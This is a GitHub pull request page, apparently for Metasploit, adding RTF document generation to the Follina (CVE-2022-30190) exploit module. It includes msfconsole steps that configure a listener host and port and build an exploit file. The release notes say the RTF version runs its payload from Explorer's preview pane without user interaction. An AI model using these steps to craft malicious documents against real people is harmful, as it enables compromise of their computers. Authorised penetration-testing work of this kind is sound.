-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add rtf support to cve-2022-30190 AKA Follina #16734
Conversation
Working on Windows 10 with the Testing Output
|
Alright I'm going to get this landed. Just double checked that the RTF and DOCX files are both working. Also the RTF file is working from the explorer preview, in which case it doesn't even need the user to enable editing. Testing Output
|
Add rtf support to cve-2022-30190 AKA Follina
Release NotesThis updates the exploit for CVE-2022-30190 (AKA Follina) to support generating RTF exploit documents. RTF documents are helpful for not only being another exploit vector, but they will trigger the payload execution when viewed by Explorer's preview tab without needing user interaction to enable editing functionality. |
@bwatters-r7 Its new cve doc type of. Ready for metasploit |
This PR adds rtf support to the msdtjs exploit 2022-30190, AKA Follina.
Verification
List the steps needed to make sure this thing works
msfconsole
usewindows/fileformat/word_msdtjs_rce
set lhost <lhost>
set lport <lport>
set FILENAME <something.rtf>
set OUTPUT_FORMAT rtf
run
Example